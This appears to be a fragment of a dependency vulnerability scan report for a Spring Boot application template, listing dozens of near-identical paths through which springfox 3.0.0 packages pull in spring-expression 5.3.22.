  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
